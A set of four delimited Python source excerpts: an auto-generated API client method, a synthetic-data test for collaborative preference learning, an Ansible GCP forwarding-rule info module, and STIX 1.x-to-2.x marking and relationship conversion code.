query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_group_with_contacts(self, group_id, **kwargs): # noqa: E501
"""Get group and contacts belonging to it # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_contacts(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GroupContactsDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_group_with_contacts_with_http_info(group_id, **kwargs) # noqa: E501
def get_group_with_contacts_with_http_info(self, group_id, **kwargs): # noqa: E501
"""Get group and contacts belonging to it # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_group_with_contacts_with_http_info(group_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str group_id: groupId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GroupContactsDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns | |
<gh_stars>10-100
'''
Test the preference_features module with some simple synthetic data test
Created on 3 Mar 2017
@author: edwin
'''
import logging
import os
import sys
from gp_pref_learning import GPPrefLearning
logging.basicConfig(level=logging.DEBUG)
sys.path.append("./python")
sys.path.append("./python/analysis")
sys.path.append("./python/models")
sys.path.append("./python/analysis/lukin_comparison")
import numpy as np
from gp_classifier_vb import matern_3_2_from_raw_vals
from scipy.stats import multivariate_normal as mvn, norm, bernoulli, kendalltau
from scipy.linalg import block_diag
from collab_pref_learning_vb import CollabPrefLearningVB
from collab_pref_learning_svi import CollabPrefLearningSVI
from sklearn.metrics import f1_score, roc_auc_score
def evaluate_models_personal(model, item_features, person_features, F,
pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points,
pair1idxs_test, pair2idxs_test, personidxs_test, test_points):
'''
Test performance in predicting the ground truth or common mean preference function
from multi-user labels.
'''
model.fit(
personidxs_tr,
pair1idxs_tr,
pair2idxs_tr,
item_features,
prefs_tr,
person_features,
optimize=False,
use_median_ls=True
)
#print(("Final lower bound: %f" % model.lowerbound()))
# Predict at all locations
Fpred = model.predict_f(item_features, person_features)
tau_obs = kendalltau(F[train_points], Fpred[train_points])[0]
print("Kendall's tau (observations): %.3f" % tau_obs)
# Evaluate the accuracy of the predictions
# print("RMSE of %f" % np.sqrt(np.mean((f-fpred)**2))
# print("NLPD of %f" % -np.sum(norm.logpdf(f, loc=fpred, scale=vpred**0.5))
tau_test = kendalltau(F[test_points], Fpred[test_points])[0]
print("Kendall's tau (test): %.3f" % tau_test)
# noise rate in the pairwise data -- how many of the training pairs conflict with the ordering suggested by f?
prefs_tr_noisefree = (F[pair1idxs_tr, personidxs_tr] > F[pair2idxs_tr, personidxs_tr]).astype(float)
noise_rate = 1.0 - np.mean(prefs_tr == prefs_tr_noisefree)
print('Noise rate in the pairwise training labels: %f' % noise_rate)
t = (F[pair1idxs_test, personidxs_test] > F[pair2idxs_test, personidxs_test]).astype(int)
if np.unique(t).shape[0] == 1:
idxs_to_flip = np.random.choice(len(pair1idxs_test), int(0.5 * len(pair1idxs_test)), replace=False)
tmp = pair1idxs_test[idxs_to_flip]
pair1idxs_test[idxs_to_flip] = pair2idxs_test[idxs_to_flip]
pair2idxs_test[idxs_to_flip] = tmp
t[idxs_to_flip] = 1 - t[idxs_to_flip]
rho_pred = model.predict(personidxs_test, pair1idxs_test, pair2idxs_test, item_features, person_features)
rho_pred = rho_pred.flatten()
t_pred = np.round(rho_pred)
brier = np.sqrt(np.mean((t - rho_pred) ** 2))
print("Brier score of %.3f" % brier)
rho_pred[rho_pred < 1e-5] = 1e-5
rho_pred[rho_pred > 1-1e-5] = 1-1e-5
cee = -np.mean(t * np.log(rho_pred) + (1 - t) * np.log(1 - rho_pred))
print("Cross entropy error of %.3f" % cee)
f1 = f1_score(t, t_pred)
print("F1 score of %.3f" % f1)
acc = np.mean(t == t_pred)
print("Accuracy of %.3f" % acc)
roc = roc_auc_score(t, rho_pred)
print("ROC of %.3f" % roc)
return noise_rate, tau_obs, tau_test, brier, cee, f1, acc, roc
def evaluate_models_common_mean(model, item_features, person_features, f,
pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points,
pair1idxs_test, pair2idxs_test, test_points):
'''
Test performance in predicting the ground truth or common mean preference function
from multi-user labels.
'''
model.fit(
personidxs_tr,
pair1idxs_tr,
pair2idxs_tr,
item_features,
prefs_tr,
person_features,
optimize=False,
use_median_ls=True
)
#print(("Final lower bound: %f" % model.lowerbound()))
# Predict at all locations
fpred = model.predict_t(item_features)
tau_obs = kendalltau(f[train_points], fpred[train_points])[0]
print("Kendall's tau (observations): %.3f" % tau_obs)
# Evaluate the accuracy of the predictions
# print("RMSE of %f" % np.sqrt(np.mean((f-fpred)**2))
# print("NLPD of %f" % -np.sum(norm.logpdf(f, loc=fpred, scale=vpred**0.5))
tau_test = kendalltau(f[test_points], fpred[test_points])[0]
print("Kendall's tau (test): %.3f" % tau_test)
# noise rate in the pairwise data -- how many of the training pairs conflict with the ordering suggested by f?
prefs_tr_noisefree = (f[pair1idxs_tr] > f[pair2idxs_tr]).astype(float)
noise_rate = 1.0 - np.mean(prefs_tr == prefs_tr_noisefree)
print('Noise rate in the pairwise training labels: %f' % noise_rate)
t = (f[pair1idxs_test] > f[pair2idxs_test]).astype(int)
if np.unique(t).shape[0] == 1:
idxs_to_flip = np.random.choice(len(pair1idxs_test), int(0.5 * len(pair1idxs_test)), replace=False)
tmp = pair1idxs_test[idxs_to_flip]
pair1idxs_test[idxs_to_flip] = pair2idxs_test[idxs_to_flip]
pair2idxs_test[idxs_to_flip] = tmp
t[idxs_to_flip] = 1 - t[idxs_to_flip]
rho_pred = model.predict_common(item_features, pair1idxs_test, pair2idxs_test)
rho_pred = rho_pred.flatten()
t_pred = np.round(rho_pred)
brier = np.sqrt(np.mean((t - rho_pred) ** 2))
print("Brier score of %.3f" % brier)
rho_pred[rho_pred < 1e-5] = 1e-5
rho_pred[rho_pred > 1-1e-5] = 1-1e-5
cee = -np.mean(t * np.log(rho_pred) + (1 - t) * np.log(1 - rho_pred))
print("Cross entropy error of %.3f" % cee)
f1 = f1_score(t, t_pred)
print("F1 score of %.3f" % f1)
acc = np.mean(t == t_pred)
print("Accuracy of %.3f" % acc)
roc = roc_auc_score(t, rho_pred)
print("ROC of %.3f" % roc)
return noise_rate, tau_obs, tau_test, brier, cee, f1, acc, roc
def split_dataset(N, F, pair1idxs, pair2idxs, personidxs, prefs):
# test set size
test_size = 0.5
# select some data points as test only
Ntest = int(np.ceil(test_size * N))
if Ntest < 2: Ntest = 2 # need to have at least one pair!
test_points = np.random.choice(N, Ntest, replace=False)
test_points = np.in1d(np.arange(N), test_points)
train_points = np.invert(test_points)
Ftrain = F[train_points]
Ftest = F[test_points]
train_pairs = train_points[pair1idxs] & train_points[pair2idxs]
Ptrain = np.sum(train_pairs)
pair1idxs_tr = pair1idxs[train_pairs]
pair2idxs_tr = pair2idxs[train_pairs]
prefs_tr = prefs[train_pairs]
personidxs_tr = personidxs[train_pairs]
test_pairs = test_points[pair1idxs] & test_points[pair2idxs]
Ptest = np.sum(test_pairs)
pair1idxs_test = pair1idxs[test_pairs]
pair2idxs_test = pair2idxs[test_pairs]
prefs_test = prefs[test_pairs]
personidxs_test = personidxs[test_pairs]
# some pairs with one train and one test item will be discarded
print("No. training pairs: %i" % Ptrain)
print("No. test pairs: %i" % Ptest)
return Ftrain, pair1idxs_tr, pair2idxs_tr, personidxs_tr, prefs_tr, train_points, Ftest, \
pair1idxs_test, pair2idxs_test, personidxs_test, prefs_test, test_points
def gen_synthetic_personal_prefs(Nfactors, nx, ny, N, Npeople, P, ls, sigma, s, lsy, Npeoplefeatures=4):
if N > nx * ny:
N = nx * ny # can't have more locations than there are grid squares (only using discrete values here)
# Some random feature values
xvals = np.random.choice(nx, N, replace=True)[:, np.newaxis]
yvals = np.random.choice(ny, N, replace=True)[:, np.newaxis]
# remove repeated coordinates
for coord in range(N):
while np.sum((xvals == xvals[coord]) & (yvals == yvals[coord])) > 1:
xvals[coord] = np.random.choice(nx, 1)
yvals[coord] = np.random.choice(ny, 1)
Kt = matern_3_2_from_raw_vals(np.concatenate((xvals.astype(float), yvals.astype(float)), axis=1), ls)
t = mvn.rvs(cov=Kt/sigma).reshape(nx * ny, 1)
# Kw = [Kt for _ in range(Nfactors)]
# Kw = block_diag(*Kw)
# w = mvn.rvs(cov=Kw/s).reshape(Nfactors, nx * ny).T
w = np.empty((nx*ny, Nfactors))
for f in range(Nfactors):
if np.isscalar(s):
w[:, f] = mvn.rvs(cov=Kt/s)
else:
w[:, f] = mvn.rvs(cov=Kt / s[f])
# person_features = None
person_features = np.zeros((Npeople, Npeoplefeatures))
for i in range(Npeoplefeatures):
person_features[:, i] = np.random.choice(10, Npeople, replace=True)
person_features += np.random.rand(Npeople, Npeoplefeatures) * 0.01
Ky = matern_3_2_from_raw_vals(person_features, lsy)
# Ky = [Ky for _ in range(Nfactors)]
# Ky = block_diag(*Ky)
# y = mvn.rvs(cov=Ky).reshape(Nfactors, Npeople)
y = np.empty((Nfactors, Npeople))
for f in range(Nfactors):
y[f] = mvn.rvs(cov=Ky)
f_all = w.dot(y) + t
# divide P between people
personidxs = np.random.choice(Npeople, P, replace=True)
# generate pairs indices
pair1idxs = np.random.choice(N, P, replace=True)
pair2idxs = np.random.choice(N, P, replace=True)
# remove indexes of pairs that compare the same data points -- the correct answer is trivial
while(np.sum(pair1idxs==pair2idxs)):
matchingidxs = pair1idxs==pair2idxs
pair2idxs[matchingidxs] = np.random.choice(N, np.sum(matchingidxs), replace=True)
# generate the discrete labels from the noisy preferences
g_f = (f_all[pair1idxs, personidxs] - f_all[pair2idxs, personidxs]) / np.sqrt(2)
phi = norm.cdf(g_f)
prefs = bernoulli.rvs(phi)
item_features = np.concatenate((xvals, yvals), axis=1)
return prefs, item_features, person_features, pair1idxs, pair2idxs, personidxs, f_all, w, t.flatten(), y
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
fix_seeds = True
do_profiling = False
if do_profiling:
import cProfile, pstats, io
pr = cProfile.Profile()
pr.enable()
# make sure the simulation is repeatable
if fix_seeds:
np.random.seed(11)
logging.info( "Testing Bayesian preference components analysis using synthetic data..." )
if 'item_features' not in globals():
# Npeople = 20
# N = 25
# P = 100 # pairs per person in test+training set
# nx = 5
# ny = 5
Npeople = 8
N = 16
P = 5000
nx = 4
ny = 4
Npeoplefeatures = 3
ls = [10, 5]
s = 0.1
sigma = 0.1
lsy = 2 + np.zeros(Npeoplefeatures)
Nfactors = 2
prefs, item_features, person_features, pair1idxs, pair2idxs, personids, latent_f, w, t, y = \
gen_synthetic_personal_prefs(Nfactors, nx, ny, N, Npeople, P, ls, sigma, s, lsy, Npeoplefeatures)
# return t as a grid
t = t.reshape(nx, ny)
Ptest_percent = 0.2
Ptest = int(Ptest_percent * pair1idxs.size)
testpairs = np.random.choice(pair1idxs.shape[0], Ptest, replace=False)
testidxs = np.zeros(pair1idxs.shape[0], dtype=bool)
testidxs[testpairs] = True
trainidxs = np.invert(testidxs)
# if fix_seeds:
# np.random.seed() # do this if we want to use a different seed each time to test the variation in results
# Model initialisation --------------------------------------------------------------------------------------------
if len(sys.argv) > 1:
use_svi = sys.argv[1] == 'svi'
else:
use_svi = True
use_t = True
use_person_features = True
optimize = False
ls_initial = np.array(ls)# + np.random.rand(len(ls)) * 10)
print(("Initial guess of length scale for items: %s, true length scale is %s" % (ls_initial, ls)))
lsy_initial = np.array(lsy)# + np.random.rand(len(lsy)) * 10)# + 7
print(("Initial guess of length scale for people: %s, true length scale is %s" % (lsy_initial, lsy)))
if use_svi:
model = CollabPrefLearningSVI(2, Npeoplefeatures if use_person_features else 0, ls=ls_initial,
lsy=lsy_initial, use_common_mean_t=use_t,
nfactors=5, ninducing=7, max_update_size=200, delay=25,
| |
<reponame>usegalaxy-no/usegalaxy
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_forwarding_rule_info
description:
- Gather info for GCP ForwardingRule
short_description: Gather info for GCP ForwardingRule
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters).
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
type: list
elements: str
region:
description:
- A reference to the region where the regional forwarding rule resides.
- This field is not applicable to global forwarding rules.
required: true
type: str
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
elements: str
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- for authentication, you can set service_account_file using the C(gcp_service_account_file)
env variable.
- for authentication, you can set service_account_contents using the C(GCP_SERVICE_ACCOUNT_CONTENTS)
env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variables values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: get info on a forwarding rule
gcp_compute_forwarding_rule_info:
region: us-west1
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
resources:
description: List of resources
returned: always
type: complex
contains:
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
isMirroringCollector:
description:
- Indicates whether or not this load balancer can be used as a collector for
packet mirroring. To prevent mirroring loops, instances behind this load balancer
will not have their traffic mirrored even if a PacketMirroring rule applies
to them. This can only be set to true for load balancers that have their loadBalancingScheme
set to INTERNAL.
returned: success
type: bool
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
id:
description:
- The unique identifier for the resource.
returned: success
type: int
IPAddress:
description:
- The IP address that this forwarding rule is serving on behalf of.
- Addresses are restricted based on the forwarding rule's load balancing scheme
(EXTERNAL or INTERNAL) and scope (global or regional).
- When the load balancing scheme is EXTERNAL, for global forwarding rules, the
address must be a global IP, and for regional forwarding rules, the address
must live in the same region as the forwarding rule. If this field is empty,
an ephemeral IPv4 address from the same scope (global or regional) will be
assigned. A regional forwarding rule supports IPv4 only. A global forwarding
rule supports either IPv4 or IPv6.
- When the load balancing scheme is INTERNAL, this can only be an RFC 1918 IP
address belonging to the network/subnet configured for the forwarding rule.
By default, if this field is empty, an ephemeral internal IP address will
be automatically allocated from the IP range of the subnet or network configured
for this forwarding rule.
- 'An address can be specified either by a literal IP address or a URL reference
to an existing Address resource. The following examples are all valid: * 172.16.17.32
* U(https://www.googleapis.com/compute/v1/projects/project/regions/region/addresses/address)
* projects/project/regions/region/addresses/address * regions/region/addresses/address
* global/addresses/address * address .'
returned: success
type: str
IPProtocol:
description:
- The IP protocol to which this rule applies.
- When the load balancing scheme is INTERNAL, only TCP and UDP are valid.
returned: success
type: str
backendService:
description:
- A BackendService to receive the matched traffic. This is used only for INTERNAL
load balancing.
returned: success
type: dict
loadBalancingScheme:
description:
- This signifies what the ForwardingRule will be used for and can be EXTERNAL,
INTERNAL, or INTERNAL_MANAGED. EXTERNAL is used for Classic Cloud VPN gateways,
protocol forwarding to VMs from an external IP address, and HTTP(S), SSL Proxy,
TCP Proxy, and Network TCP/UDP load balancers.
- INTERNAL is used for protocol forwarding to VMs from an internal IP address,
and internal TCP/UDP load balancers.
- INTERNAL_MANAGED is used for internal HTTP(S) load balancers.
returned: success
type: str
name:
description:
- Name of the resource; provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
network:
description:
- For internal load balancing, this field identifies the network that the load
balanced IP should belong to for this Forwarding Rule. If this field is not
specified, the default network will be used.
- This field is only used for INTERNAL load balancing.
returned: success
type: dict
portRange:
description:
- This field is used along with the target field for TargetHttpProxy, TargetHttpsProxy,
TargetSslProxy, TargetTcpProxy, TargetVpnGateway, TargetPool, TargetInstance.
- Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets addressed
to ports in the specified range will be forwarded to target.
- Forwarding rules with the same [IPAddress, IPProtocol] pair must have disjoint
port ranges.
- 'Some types of forwarding target have constraints on the acceptable ports:
* TargetHttpProxy: 80, 8080 * TargetHttpsProxy: 443 * TargetTcpProxy: 25,
43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetSslProxy:
25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995, 1883, 5222 * TargetVpnGateway:
500, 4500 .'
returned: success
type: str
ports:
description:
- This field is used along with the backend_service field for internal load
balancing.
- When the load balancing scheme is INTERNAL, a single port or a comma separated
list of ports can be configured. Only packets addressed to these ports will
be forwarded to the backends configured with this forwarding rule.
- You may specify a maximum of up to 5 ports.
returned: success
type: list
subnetwork:
description:
- The subnetwork that the load balanced IP should belong to for this Forwarding
Rule. This field is only used for INTERNAL load balancing.
- If the network specified is in auto subnet mode, this field is optional. However,
if the network is in custom subnet mode, a subnetwork must be specified.
returned: success
type: dict
target:
description:
- The URL of the target resource to receive the matched traffic.
- The target must live in the same region as the forwarding rule.
- The forwarded traffic must be of a type | |
marking_definition_instance["id"])
return_obj.append(marking_definition_instance)
else:
if get_option_value("spec_version") == "2.1":
warn("ACS data markings only supported when --acs option is used. See %s", 436, isa_marking.identifier)
else:
warn("ACS data markings cannot be supported in version 2.0.", 217)
return return_obj, isa_marking
def get_marking_specifications(stix1_object):
container = get_option_value("marking_container")
return container.get_markings(stix1_object)
def get_object_marking_refs(stix1_marking_specifications):
object_marking_refs = []
for marking_specification in stix1_marking_specifications or []:
for marking_structure in marking_specification.marking_structures:
stix2x_marking = map_1x_markings_to_2x(marking_structure)
if isinstance(stix2x_marking, dict):
object_marking_refs.append(stix2x_marking["id"])
else:
object_marking_refs.append(stix2x_marking)
return object_marking_refs
def create_marking_union(*stix1_objects):
union_object_marking_refs = []
for stix1_object in stix1_objects:
stix2_marking_refs = get_object_marking_refs(get_marking_specifications(stix1_object))
union_object_marking_refs.extend(stix2_marking_refs)
return list(set(union_object_marking_refs))
def finish_markings(instance, env, marking_specifications, temp_marking_id=None):
object_marking_refs = []
isa_marking = None
isa_marking_assertions = []
for marking_specification in marking_specifications:
for marking_structure in marking_specification.marking_structures:
if not check_map_1x_markings_to_2x(marking_structure):
stix2x_markings, ignore = convert_marking_specification(marking_specification,
env,
instance["id"],
isa_marking,
isa_marking_assertions)
for m in stix2x_markings:
if m["definition_type"] == "ais":
apply_ais_markings(instance, m)
object_marking_refs.append(m["marking_ref"])
elif instance["id"] != m["id"] and m["id"] not in object_marking_refs:
object_marking_refs.append(m["id"])
env.bundle_instance["objects"].append(m)
else:
env.bundle_instance["objects"].append(m)
else:
stix2x_marking = map_1x_markings_to_2x(marking_structure)
if (instance["id"] != stix2x_marking["id"] and
stix2x_marking["id"] not in object_marking_refs):
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
elif temp_marking_id:
object_marking_refs.append(temp_marking_id)
if env.created_by_ref and instance["id"] != env.created_by_ref:
instance["created_by_ref"] = env.created_by_ref
if object_marking_refs:
instance["object_marking_refs"] = object_marking_refs
def finish_basic_object(old_id, instance, env, stix1x_obj, temp_marking_id=None):
if old_id is not None:
record_ids(old_id, instance["id"])
if hasattr(stix1x_obj, "related_packages") and stix1x_obj.related_packages is not None:
for p in stix1x_obj.related_packages:
warn("Related_Packages type in %s not supported in STIX 2.x", 402, stix1x_obj.id_)
# Attach markings to SDO if present.
marking_specifications = get_marking_specifications(stix1x_obj)
finish_markings(instance, env, marking_specifications, temp_marking_id=None)
# Sightings
def handle_sightings_observables(related_observables, env):
refs = []
for ref in related_observables:
if ref.item.idref is None:
# embedded
new20s = handle_embedded_object(ref.item, env)
for new20 in new20s:
refs.append(new20["id"])
else:
refs.append(ref.item.idref)
return refs
def process_information_source_for_sighting(sighting, sighting_instance, env):
if sighting.source:
information_source = sighting.source
if information_source.identity is not None:
sighting_instance["where_sighted_refs"] = [get_identity_ref(information_source.identity, env, created_by_ref_source="this_identity")]
if information_source.description:
process_description_and_short_description(sighting_instance, sighting)
if information_source.references:
for ref in information_source.references:
sighting_instance["external_references"].append({"url": ref})
if information_source.roles:
handle_missing_string_property(sighting_instance, "information_source_roles", information_source.roles,
True, is_literal=True)
if information_source.tools:
for tool in information_source.tools:
handle_missing_tool_property(sighting_instance, tool)
def handle_sighting(sighting, sighted_object_id, env):
sighting_instance = create_basic_object("sighting", sighting, env)
sighting_instance["count"] = 1
sighting_instance["created_by_ref"] = env.created_by_ref
sighting_instance["sighting_of_ref"] = sighted_object_id
process_description_and_short_description(sighting_instance, sighting)
if sighting.related_observables:
sighting_instance["observed_data_refs"] = handle_sightings_observables(sighting.related_observables, env)
if sighting.source:
process_information_source_for_sighting(sighting, sighting_instance, env)
# assumption is that the observation is a singular, not a summary of observations
sighting_instance["summary"] = False
finish_basic_object(None, sighting_instance, env, sighting)
return sighting_instance
# Relationships
def finish_markings_for_relationship(instance, marking_refs, temp_marking_id=None):
object_marking_refs = []
for marking_ref in marking_refs:
stix2x_marking = lookup_marking_reference(marking_ref)
if stix2x_marking:
if (instance["id"] != stix2x_marking["id"] and
stix2x_marking["id"] not in object_marking_refs):
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
elif temp_marking_id:
object_marking_refs.append(temp_marking_id)
else:
object_marking_refs.append(marking_ref)
if object_marking_refs:
instance["object_marking_refs"] = object_marking_refs
def create_relationship(source_ref, target_ref, env, verb, rel_obj=None, marking_refs=None):
relationship_instance = create_basic_object("relationship", rel_obj, env)
relationship_instance["source_ref"] = source_ref
relationship_instance["target_ref"] = target_ref
relationship_instance["relationship_type"] = verb
if env.created_by_ref:
relationship_instance["created_by_ref"] = env.created_by_ref
if rel_obj is not None and hasattr(rel_obj, "relationship") and rel_obj.relationship is not None:
relationship_instance["description"] = rel_obj.relationship.value
if marking_refs:
finish_markings_for_relationship(relationship_instance, marking_refs)
# double check in finalize_bundle
add_unfinished_marked_object(relationship_instance)
return relationship_instance
# Creating and Linking up relationships (three cases)
# 1. The object is embedded - create the object, add it to the bundle, return to id so the relationship is complete
# 2. an idref is given, and it has a corresponding 2.0 id, use it
# 3. an idref is given, but it has NO corresponding 2.0 id, add 1.x id, and fix at the end in fix_relationships
def handle_relationship_to_objs(items, source_id, env, verb, marking_refs):
for item in items:
new_stix2_instances = handle_embedded_object(item, env)
for new_2x in new_stix2_instances:
env.bundle_instance["relationships"].append(
create_relationship(source_id, new_2x["id"] if new_2x else None, env, verb, item, marking_refs)
)
def handle_embedded_ref(stix1_relationship, item, ref1, env, default_verb, to_direction, marking_refs):
new_stix2_instances = handle_embedded_object(item, env)
for new_2x in new_stix2_instances:
if to_direction:
source_id = ref1
target_id = new_2x["id"] if new_2x else None
else:
source_id = new_2x["id"] if new_2x else None
target_id = ref1
env.bundle_instance["relationships"].append(
create_relationship(source_id, target_id, env,
determine_appropriate_verb(default_verb, target_id),
stix1_relationship,
marking_refs)
)
def handle_existing_ref(stix1_relationship, ref1, ref2, env, default_verb, to_direction, marking_refs):
source_id = ref2 if to_direction else ref1
target_id = ref1 if to_direction else ref2
env.bundle_instance["relationships"].append(
create_relationship(source_id, target_id, env, default_verb, stix1_relationship, marking_refs=marking_refs)
)
def handle_existing_refs(ref, id, env, verb, to_direction, marking_refs):
for ref_id in get_id_value(ref.item.idref):
handle_existing_ref(ref, ref_id, id, env, verb, to_direction, marking_refs)
def handle_relationship_ref(ref, item, id, env, default_verb, to_direction=True, marking_refs=None):
if item.idref is None:
handle_embedded_ref(ref, item, id, env, default_verb, to_direction, marking_refs)
elif exists_id_key(item.idref):
handle_existing_refs(ref, id, env, default_verb, to_direction, marking_refs)
else:
# a forward reference, fix later
source_id = id if to_direction else item.idref
target_id = str(item.idref) if to_direction else id
rel_obj = create_relationship(source_id, target_id, env, default_verb, item, marking_refs)
if hasattr(ref, "relationship") and ref.relationship is not None:
rel_obj["description"] = ref.relationship.value
env.bundle_instance["relationships"].append(rel_obj)
def handle_relationship_to_refs(refs, source_id, env, default_verb, marking_refs=None):
for ref in refs:
if hasattr(ref, "item"):
item = ref.item
elif hasattr(ref, "course_of_action"):
item = ref.course_of_action
refs_markings = list(set(create_marking_union(item) + marking_refs))
handle_relationship_ref(ref, item, source_id, env, default_verb, to_direction=True, marking_refs=refs_markings)
def handle_relationship_from_refs(refs, target_id, env, default_verb, marking_refs=None):
for ref in refs:
if hasattr(ref, "item"):
item = ref.item
elif hasattr(ref, "course_of_action"):
item = ref.course_of_action
refs_markings = list(set(create_marking_union(item) + marking_refs))
handle_relationship_ref(ref, item, target_id, env, default_verb, to_direction=False, marking_refs=refs_markings)
def handle_observable_information_list_as_pattern(obs_list):
return convert_observable_list_to_pattern(obs_list)
def handle_observable_information_list(obs_list, source_id, env, verb, marking_refs):
for o in obs_list:
obs_markings = list(set(create_marking_union(o) + marking_refs))
if o.idref is None and o.object_ and not o.object_.idref:
# embedded, so generate scos too
new_od = convert_observed_data(o, env)
add_id_of_obs_in_characterizations(new_od["id"])
for obj_ref in new_od["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, obj_ref, env, verb, marking_refs=obs_markings)
)
else:
if o.idref:
idref = o.idref
elif o.idref is None and o.object_ and o.object_.idref:
idref = generate_stix2x_id("observed-data", o.object_.idref)
obs_markings = list(set(create_marking_union(o.object_) + marking_refs))
if id_in_observed_data_mappings(idref):
obs2x = get_observed_data_from_mapping(idref)
add_id_of_obs_in_characterizations(obs2x["id"])
for ref in obs2x["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, ref, env, verb, marking_refs=obs_markings)
)
else:
if id_in_observable_mappings(idref):
# handling a reference, scos generated later
new_od = convert_observed_data(get_obs_from_mapping(idref), env, keep_scos=False)
add_id_of_obs_in_characterizations(new_od["id"])
env.bundle_instance["objects"].append(new_od)
for ref in new_od["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, ref, env, verb, marking_refs=obs_markings)
)
else:
# a forward reference, fix later
env.bundle_instance["relationships"].append(
create_relationship(source_id, idref, env, verb, marking_refs=obs_markings)
)
def reference_needs_fixing(ref):
return ref and ref.find("--") == -1
# this is very simplistic - because STIX 1.x verbs are not consistent.
def determine_appropriate_verb(current_verb, m_id):
if m_id is not None and current_verb == "uses":
type_and_uuid = m_id.split("--")
if type_and_uuid[0] == "identity":
return u"targets"
return current_verb
# for ids in source and target refs that are still 1.x ids,
def fix_relationships(env):
extra_relationships = []
bundle_instance = env.bundle_instance
for ref in bundle_instance["relationships"]:
if is_stix1x_id(ref["source_ref"]):
if not exists_id_key(ref["source_ref"]):
new_id = generate_stix2x_id(None, str.lower(ref["source_ref"]))
if new_id is None:
error("Dangling source reference %s in %s", 601, ref["source_ref"], ref["id"])
add_id_value(ref["source_ref"], new_id)
mapped_ids = get_id_value(ref["source_ref"])
if mapped_ids[0] is None:
error("Dangling source reference %s in %s", 601, ref["source_ref"], ref["id"])
first_one = True
for m_id in mapped_ids:
if first_one:
ref["source_ref"] = m_id
first_one = False
else:
extra_relationships.append(
